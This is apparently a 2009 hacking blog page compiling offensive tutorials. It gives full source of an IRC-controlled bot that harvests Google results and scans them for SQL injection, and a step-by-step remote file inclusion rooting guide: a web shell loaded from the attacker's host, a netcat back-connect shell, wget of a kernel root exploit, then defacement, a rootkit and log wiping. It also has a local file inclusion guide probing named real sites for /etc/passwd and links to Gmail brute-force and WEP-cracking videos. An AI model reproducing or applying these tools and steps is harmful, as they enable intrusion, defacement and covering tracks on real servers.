Monday, March 9, 2009

Using SQLi Scanner Bot - sqlifinderbot.py (Video - QuickTime Required) [Source]

Download Tutorial :- http://darkc0de.com/tutorials/SQLiFinderb0t.zip


#!/usr/bin/env python
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# SQLi Error Scanner /w Google Search

# darkc0decracker Crew
# www.darkc0decracker.blogspot.com

# Greetz to
# d3hydr0, P47r1ck, Tarsian, c0mr@d, reverenddigitalx, beenu, baltazar, C1c4Tr1Z, Well0ne
# and the rest of the Darkc0de members

# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# Intended for authorized Web Application Pen Testing!

import sys, socket, re, string, urllib2, sets, random, time, threading

if len(sys.argv) != 5:
print "Usage: ./sqlifinderb0t.py "
sys.exit(1)

agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
"Microsoft Internet Explorer/4.0b1 (Windows 95)",
"Opera/8.00 (Windows NT 5.1; U; en)"]

langs = ["en", "it", "nl", "ru", "ua", "pl", "de", "be", "kr", "fr", "es", "se", "no", "ir", "za"]
sites=[]
tba=[]
threads =[]
numthreads = 1
verbose = 0
#---------------------------------------------------------
#Edit what you want added to the address.
EXT = "'"

#Edit what you want to search for.
MATCH = "error in your SQL syntax"
#---------------------------------------------------------

def getsites(lang):
try:
page_counter=0
while page_counter < int(arg_page_end):
s.send("PONG %s\r\n" % line[1])
time.sleep(3)
results_web = 'http://www.google.com/search?q='+str(query)+'&hl='+str(lang)+'&lr=&ie=UTF-8&start='+repr(page_counter)+'&sa=N'
request_web = urllib2.Request(results_web)
request_web.add_header('User-Agent',random.choice(agents))
opener_web = urllib2.build_opener()
text = opener_web.open(request_web).read()
if re.search("403 Forbidden", text):
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] Received Captcha... Damn that sucks!"))
break
names = re.findall(('+[\w\d\?\/\.\=\s\-]+=+[\d]+[\w\d\?\/\.\=\s\-]+'),text.replace("","").replace("",""))
for name in names:
name = re.sub(" - \d+k - ","",name.replace("","")).replace("","")
name = name.rstrip(" -")
sites.append(name)
page_counter +=10

except IOError:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] Can't connect to Google Web!"))

def parse_urls(links):
urls = []
for link in links:
num = link.count("=")
if num > 0:
for x in xrange(num):
link = link.rsplit(('=+[\d]'),x+1)[0]
urls.append(link+EXT)
urls = list(sets.Set(urls))
return urls

def test(host):
socket.setdefaulttimeout(5)
if int(verbose) == 1:
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Testing:", host))
try:
if host[:7] != "http://":
host = "http://"+host
source = urllib2.urlopen(host).read()
if re.search(MATCH, source):
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[!] Found:", host))
file = open("foundsqli.txt", "a")
file.write("\n[!] Found: "+host)
file.close()
else:
if int(verbose) == 1:
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[-] Not Vuln:", host))
except(socket.gaierror, socket.timeout, socket.error), msg:
s.send("PRIVMSG %s :%s%s @ %s\r\n" % (CHAN, "[-] Error: ",msg, host))
except:
pass

class TestThread(threading.Thread):
def __init__(self,hosts):
self.hosts=hosts
self.fcount = 0
threading.Thread.__init__(self)

def run (self):
urls = parse_urls(self.hosts)
for url in urls:
try:
test(url.replace("\n",""))
except(KeyboardInterrupt):
pass
file = open("sqlitested.txt", "a")
for tbw in self.hosts:
file.write(tbw+"\n")
file.close()
self.fcount+=1

PASS = ""
HOST = sys.argv[1]
PORT = int(sys.argv[2])
NICK = sys.argv[3]
CHAN = sys.argv[4]
if len(sys.argv) == 6:
PASS = sys.argv[5]
readbuffer = ""
s=socket.socket( )
s.connect((HOST, PORT))
s.send("NICK %s\r\n" % NICK)
s.send("USER %s %s bla :%s\r\n" % (NICK, NICK, NICK))
s.send("JOIN :%s %s\r\n" % (CHAN, PASS))

while 1:
readbuffer=readbuffer+s.recv(1024)
temp=string.split(readbuffer, "\n")
readbuffer=temp.pop( )
for line in temp:
line=string.rstrip(line)
line=string.split(line)
try:
if line[1] == "JOIN":
name = str(line[0].split("!")[0])
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "Welcome, ", name.replace(":","")))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "|----------------------------|"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| rsauron[at]gmail[dot]com v1.0"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| 8/2008 SQLi Finder Bot"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| - Scans Sites for SQLi errors"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| - Retreives Targets from Google"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| - Stores logs of Found and Tested"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| - Multi-Threading Scanning! - WOW"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| type !help - for help "))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "|----------------------------|"))
if line[3] == ":!help":
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Displaying list of commands the bot understands"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !status - Shows status of b0t!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !clear - Clears the hosts in the testing array!!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !search - Gets sites to test! ex. !search "))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !show - Show list of sites to be tested!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !test - Preform Test on sites in testing array!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !langs - Shows a list a of langs that can be used for search function!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !threads - Set the number of threads to be used in testing.. default is 1!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !verbose - Verbosity ON = 1 - Verbosity OFF = 0 - Default is OFF"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !die - Kills b0t!"))
if line[3] == ":!langs":
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] These are just some langs you could use...!"))
for lang in langs:
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] ",lang))
if line[3] == ":!die":
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] b0t dying... vist darkc0de.com!!"))
sys.exit(1)
if line[3] == ":!search":
query = line[4]
lang = line[5]
arg_page_end = line[6]
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Query: ", query))
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Language: ", lang))
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Search ends: ", arg_page_end))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Starting search..."))
getsites(lang)
sites = list(sets.Set(sites))
testedfile = open("sqlitested.txt", "r")
testedsites = testedfile.read()
testedfile.close()
if testedsites.endswith("\n"):
testedsites = testedsites.rstrip("\n")
testedsites = testedsites.split("\n")
s1 = set(sites)
s2 = set(testedsites)
tba = list(s1.difference(s2))
s.send("PRIVMSG %s :%s%s%s\r\n" % (CHAN, "[+] Found ", len(tba), " sites to test!"))
if line[3] == ":!clear":
tba=[]
sites=[]
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] Testing array cleared..."))
if line[3] == ":!status":
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Number of sites loaded in testing array: ", len(tba)))
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Number of threads set for scanning: ", numthreads))
masterthread = 0
if threads != []:
for thread in threads:
masterthread+=thread.fcount
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Number of threads finished scanning: ", masterthread))
if int(verbose) == 1:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Verbosity Set ON!"))
if int(verbose) == 0:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Verbosity Set OFF!"))

if line[3] == ":!show":
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Showing sites to be tested..."))
if len(tba) < 50:
for site in tba:
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] ", site))
else:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] More then 50 sites in list... Just to many hosts to print to term! sry!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Done!"))
if line[3] == ":!threads":
numthreads = line[4]
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Number of threads set for testing: ", numthreads))
if line[3] == ":!verbose":
verbose = line[4]
if int(verbose) == 1:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Verbosity Set ON!"))
if int(verbose) == 0:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Verbosity Set OFF!"))
if line[3] == ":!test":
if tba == 0:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] No sites to test..."))
else:
s.send("PRIVMSG %s :%s%s%s\r\n" % (CHAN, "[+] Beginning test of ", len(tba), " sites!"))
threads=[]
i = len(tba) / int(numthreads)
for x in range(0, int(numthreads)):
if (x-1) == int(numthreads):
sliced = tba[x*i:]
else:
sliced = tba[x*i:(x+1)*i]
thread = TestThread(sliced)
thread.start()
threads.append(thread)

except(IndexError):
pass

if(line[0]=="PING"):
s.send("PONG %s\r\n" % line[1])

Sunday, March 8, 2009

R.F.I. Rooting Tutorial

=======================================================================
R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF)

Author: An@sA_StAxtH
Mail/MSN: admin@cyberanarchy.org/anasa_staxth@hotmail.com

For Cyber Anarchy (Nov. 2007)
=======================================================================

You will need:

- Vulnerable Site in R.F.I.
- Shell for R.F.I. (e.g. c99, r57 or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)

This aim tutorial is to give a very general picture in process of Rooting
in Linux Server with Safe Mod: OFF.

-

Suppose that we have found a site with R.F.I. vulnerability:

http://www.hackedsite.com/folder/index.html?page=

e can run shell exploiting Remote File Inclusion, as follows:

http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?

where evilscript.txt is our web shell that we have already uploaded to
our site. (www.mysite.com in the folder: shells)

After we enter in shell, first of all we will see the version of the kernel
at the top of the page or by typing: uname - a in Command line.

To continue we must connect with backconnection to the box. This can done with
two ways if we have the suitable shell.

We can use the Back-Connect module of r57/c99 shell or to upload a backconnector
in a writable folder

In most of the shells there is a backconnection feature without to upload the
Connect Back Shell (or another one shell in perl/c). We will analyze the first
way which is inside the shell (in our example the shell is r57).

Initially we open NetCat and give to listen in a specific port (this port must
be correctly opened/forwarded in NAT/Firewall if we have a router) with the
following way:

We will type: 11457 in the port input (This is the default port for the last versions
of r57 shell). We can use and other port.

We press in Windows Start -> Run -> and we type: cmd
After we will go to the NetCat directory:

e.g.

cd C:\Program Files\Netcat

And we type the following command:

nc -n -l -v -p 11457

NetCat respond: listening on [any] 11457 ...

In the central page of r57 shell we find under the following menu::: Net:: and
back-connect. In the IP Form we will type our IP (www.cmyip.com to see our ip if
we have dynamic)

In the Port form we will put the port that we opened and NetCat listens.

If we press connect the shell will respond:

Now script try connect to port 11457 ...

If our settings are correct NetCat will give us a shell to the server

Now we wil continue to the Rooting proccess.

We must find a writable folder in order to download and compile the Local
Root Exploit that will give us root priviledges in the box. Depending on the version
of the Linux kernel there are different exploits. Some times the exploits fail to run
because some boxes are patched or we don't have the correct permissions.

List of the exploits/kernel:

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.

Some sites that we can find Local Root Exploits:

www.milw0rm (Try Search: "linux kernel")

Other sites: www.packetstormsecurity.org | www.arblan.com
or try Googlin' you can find 'em all ;-)

We can find writable folders/files by typing:

find / -perm -2 -ls

We can use the /tmp folder which is a standard writable folder

We type: cd /tmp

To download the local root exploit we can use a download command for linux like
wget.

For example:

wget http://www.arblan.com/localroot/h00lyshit.c

where http://www.arblan.com/localroot/h00lyshit.c is the url of h00lyshit.

After the download we must compile the exploit (Read the instruction of the exploit
before the compile)

For the h00lyshit we must type:

gcc h00lyshit.c -o h00lyshit

Now we have created the executable file: h00lyshit.

The command to run this exploit is:

./h00lyshit

We need a very big file on the disk in order to run successfully and to get root.

We must create a big file in /tmp or into another writable folder.

The command is:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename.

We must wait 2-3 minutes for the file creation

If this command fails we can try:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can procced to the last step. We can run the exploit by typing:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(If we are in a different writable folder and the largefile is created in /tmp)

If there are not running errors (maybe the kernel is patched or is something wrong with
exploit run or large file) we will get root

To check if we got root:

id or

whoami

If it says root we got root!

Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.
SSHDoor) and to take ssh/telnet shell access to the server.

We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner.

-

*

Local File Inclusion Tutorial - Written by d3hydr0

Local File Inclusion Tutorial - Written by d3hydr0
[- How to Find LFI Vulnerability -]

How to Find LFI Vulnerability, Well i use me of adding ..
Example

www.site.com/index.php?p=..





Real World Examples:

http://www.jedit.org/index.php?page=..




Warning: main(...html): failed to open stream: No such file or directory in /home/groups/j/je/jedit/htdocs/index.php on line
63

Warning: main(): Failed opening '...html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.
php on line 63




This is not Vulnerable,
A Vulnerable should look like

Warning: include() [function.include]: Failed opening '...php' for inclusion (include_path='.:/usr/share/pear') in /
home/shiner/shiner.com/htdocs/beers/beers-home.php on line 62




include is the code , the script is using for example



$page = $_GET[page];
include($page);
?>




Should be [function.include]
but


$page = $_GET[page];
require_once($page);
?>




should be [function.require_once] or [function.require]

[- Find Example (Real) -]

http://www.crew4sea.com/indexm.php?url=..




Gives us.

Fatal error: require_once() [function.require]: Failed opening required './..' (include_path='.:/:/usr/php/pear'
) in /indexm.php on line 164




[b][function.require][/b]




So we know it Vulnerable

if Windows OS, you can just do

http://www.crew4sea.com/indexm.php?url=indexm.php





other try
http://www.crew4sea.com/indexm.php?url=/etc/passwd
http://www.crew4sea.com/indexm.php?url=/etc/passwd
http://www.crew4sea.com/indexm.php?url=../etc/passwd
http://www.crew4sea.com/indexm.php?url=../etc/passwd

until you get Something.

Tutorial on How To Hide Files in JPEG Images.

Tutorial on How To Hide Files in JPEG Images.

Written Tutorial:
In this example we will hide a text message inside a picture. We have choose for this tutorial a text file named Secret.txt and a picture firefox.jpg.

1. Move your files you want to combine in a new folder, in our case C:\Hidden.

2. Add the file you want to hide into a new RAR archive (in our example named Secret.txt.rar).

3. WinRar created the archive in the folder where our files are located.

4. Open Command Prompt (Start -> Run..., type cmd and press Enter).

5. Go to the folder where your files are located, in this case C:\Hidden by using the cmd command.

6. Now type copy /b firefox.jpg + secret.txt.rar helpero.jpg where firefox.jpg is the original picture, secret.txt.rar is the file that will be hidden, and helpero.jpg is the file which contains both.

7. If you open helpero.jpg you will see the firefox.jpg image.

8. Try opening the file with WinRar (select All files).


9. Now you can see the text file that is hidden in the picture.

Installing Nessus in Ubuntu

Open a terminal window and type in:
sudo apt-get install nessus
sudo apt-get install nessusd
sudo nessus-adduser
sudo ln -fs /etc/init.d/nessusd /etc/rc2.d/S20nessusd
sudo /etc/init.d/nessusd start
sudo gedit /usr/share/applications/Nessus.desktop

Insert the following lines into the new file

[Desktop Entry]
Name=Nessus
Comment=Nessus
Exec=nessus
Icon=/usr/share/pixmaps/nessus.xpm
Terminal=false
Type=Application
Categories=Application;System;

After that you can find Nessus in the Gnome menu under Applications -> System Tools.

Installing Ophcrack in Ubuntu

http://www.darkc0de.com/tutorials/ophcrack_install.html

Gmail BruteForce with gmailpopbrute.py (Video)

http://www.darkc0de.com/tutorials/gmailbrute.avi

MySQL Injection DataExt & Fuzzer

http://www.darkc0de.com/tutorials/schemafuzz-vid.zip

Airplay replay attack w/ no wireless client (Video)

http://www.darkc0de.com/tutorials/Airplay_replay_attack_-_no_wireless_client_required.rar

128 bit WEP cracking w/ injection (video)

http://www.darkc0de.com/tutorials/128_Bit_Wep_Cracking_With_Injection_.rar